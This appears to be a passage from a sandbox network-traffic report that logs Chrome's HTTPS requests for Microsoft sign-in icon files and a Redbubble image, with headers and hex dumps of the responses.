3	192.168.2.4	49745	152.199.4.44	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:10 UTC	624	OUT	GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:10 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 4524714 Cache-Control: public, max-age=31536000 Content-MD5: 1jQlecEJaGhFO2st5KXLhg== Content-Type: image/svg+xml Date: Thu, 18 Apr 2024 21:27:10 GMT Etag: 0x8DB5C3F4AC59B47 Last-Modified: Wed, 24 May 2023 10:11:51 GMT Server: ECAcc (agc/7F54) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 7e961d5b-a01e-006d-2fb0-68c71f000000 x-ms-version: 2009-09-19 Content-Length: 1636 Connection: close
2024-04-18 21:27:10 UTC	1636	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	13.107.246.41	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:10 UTC	618	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:10 UTC	785	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:10 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:48 GMT ETag: 0x8DB5C3F4911527F x-ms-request-id: fc0bab5e-e01e-0078-3490-914f8f000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T212710Z-15497cdd9fdx9w4fww2fv0kevn00000000sg00000000q9gn x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-18 21:27:10 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	13.107.246.41	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:10 UTC	638	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:10 UTC	806	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:10 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F499A9B99 x-ms-request-id: b5a2e5e4-301e-006d-0e96-9178a7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T212710Z-15497cdd9fdm6jmhnfv9wxmxyn00000000x0000000003p0n x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-18 21:27:10 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	13.107.246.41	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:10 UTC	621	OUT	GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:11 UTC	805	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:10 GMT Content-Type: image/svg+xml Content-Length: 199 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F49C21D98 x-ms-request-id: 0139167a-001e-004a-7e8d-91389a000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T212710Z-r1f585c6b652whcnm5ddu23pd4000000084g000000006q6d x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-18 21:27:11 UTC	199	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00 Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	13.107.213.41	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:10 UTC	616	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: logincdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:11 UTC	786	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:11 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT ETag: 0x8D79ED35591CF44 x-ms-request-id: c7e316f0-d01e-0027-2ed7-91a5a3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T212710Z-15497cdd9fdh4jhjwefk8z750000000000q0000000008e7g x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-18 21:27:11 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	72.21.91.237	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:10 UTC	602	OUT	GET /image.3812524360.1168/raf,360x360,075,t,fafafa:ca443f4786.jpg HTTP/1.1 Host: ih1.redbubble.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:10 UTC	933	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: https://www.redbubble.com Access-Control-Expose-Headers: Content-Length,Content-Range Age: 2123810 Cache-Control: max-age=31556952, public Content-Disposition: inline Content-Transfer-Encoding: binary Content-Type: image/jpeg Date: Thu, 18 Apr 2024 21:27:10 GMT Etag: W/"48273ec7955de6b58e1ccbe7525dea9a" Last-Modified: Mon, 25 Mar 2024 07:30:20 GMT Referrer-Policy: strict-origin-when-cross-origin Server: ECS (agb/52E8) X-Cache: HIT X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Request-Id: 866fb3ec-2c2c-4347-a46a-640147c51840 X-XSS-Protection: 1; mode=block Content-Length: 9489 Connection: close
2024-04-18 21:27:10 UTC	9489	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ed 00 74 50 68 6f 74 6f 73 68 6f 70 20 33 2e 30 00 38 42 49 4d 04 04 00 00 00 00 00 57 1c 01 5a 00 03 1b 25 47 1c 02 00 00 02 00 00 1c 02 74 00 43 c2 a9 20 64 65 76 65 6c 6f 70 65 72 66 72 69 64 61 79 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 72 65 64 62 75 62 62 6c 65 2e 63 6f 6d 2f 70 65 6f 70 6c 65 2f 64 65 76 65 6c 6f 70 65 72 66 72 69 64 61 00 ff db 00 43 00 06 04 05 05 05 04 06 05 05 05 07 06 06 07 09 0f 0a 09 08 08 09 13 0d 0e 0b 0f 16 13 17 17 16 13 15 15 18 1b 23 1e 18 1a 21 1a 15 15 1e 29 1f 21 24 25 27 28 27 18 1d 2b 2e 2b 26 2e 23 26 27 26 ff db 00 43 01 06 07 07 09 08 09 12 0a 0a 12 26 19 15 19 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 Data Ascii: JFIFtPhotoshop 3.08BIMWZ%GtC developerfriday - http://www.redbubble.com/people/developerfridaC#!)!$%'('+.+&.#&'&C&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49750	13.107.246.41	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:11 UTC	418	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:11 UTC	785	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:11 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:48 GMT ETag: 0x8DB5C3F4911527F x-ms-request-id: fc0bab5e-e01e-0078-3490-914f8f000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T212711Z-15497cdd9fd7zlxcshs1xwhzsn00000000rg000000009dgn x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-18 21:27:11 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49751	13.107.246.41	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:11 UTC	438	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:11 UTC	785	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:11 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:49 GMT ETag: 0x8DB5C3F499A9B99 x-ms-request-id: b5a2e5e4-301e-006d-0e96-9178a7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T212711Z-15497cdd9fdkqxspexf103svfn00000000t0000000007deg x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-18 21:27:11 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49753	152.199.4.44	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:11 UTC	424	OUT	GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:11 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 4524715 Cache-Control: public, max-age=31536000 Content-MD5: 1jQlecEJaGhFO2st5KXLhg== Content-Type: image/svg+xml Date: Thu, 18 Apr 2024 21:27:11 GMT Etag: 0x8DB5C3F4AC59B47 Last-Modified: Wed, 24 May 2023 10:11:51 GMT Server: ECAcc (agc/7F54) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 7e961d5b-a01e-006d-2fb0-68c71f000000 x-ms-version: 2009-09-19 Content-Length: 1636 Connection: close
2024-04-18 21:27:11 UTC	1636	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	72.21.91.237	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
